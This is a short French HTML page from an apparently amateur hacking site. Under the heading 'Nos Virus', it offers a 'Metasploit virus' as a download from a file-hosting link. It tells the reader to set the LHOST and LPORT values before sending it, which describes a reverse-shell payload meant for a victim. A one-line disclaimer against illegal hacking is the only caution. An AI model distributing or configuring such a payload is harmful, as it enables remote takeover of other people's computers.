<!doctype html>
<html>

	<head>
		
		<link rel="icon" type="image/png" href="images/AFL (6).png" />
	
		<button><h3><a href="index.html">Retour</a></h3></button><br>
			
		<center><h1>Nos Virus : </h1></center> <br><br>
		
		<center><h3>Attention : Ce site n'encourage pas le Hacking de facon illégale !</h3></center><br><br><br>
		
		<style>
		body {
			background-color : rgb(37, 37, 37);
		        font-family: Arial;
		}
		
		h1 {
			color : white;
		}
		
		h3 {
			color : white;
		}
		
		h4 {
			color : white;
		}
		
		button {
			color: white;
			border-radius: 20px;
			background-color: white;
			border-color: white;
		}
		
		</style>
		
	</head>
	
	<body>
		<h4>Virus Metasploit : </h4> 
		<center><img src="images/virus.jpg"></center><br>
		<center><h5>Virus A utiliser avec Metasploit, il faut configurer le<br>LHOST et le LPORT avant de l'envoyer.</h5><br></center>
		<center><button><a href="https://mega.nz/file/PHRziAwZ#DiB-y5Qe5-X07-rANQca0Eg-hblM6JBNE-eMzGF8C5s">Telecharger</a></button></center>
		
	</body>
</html>
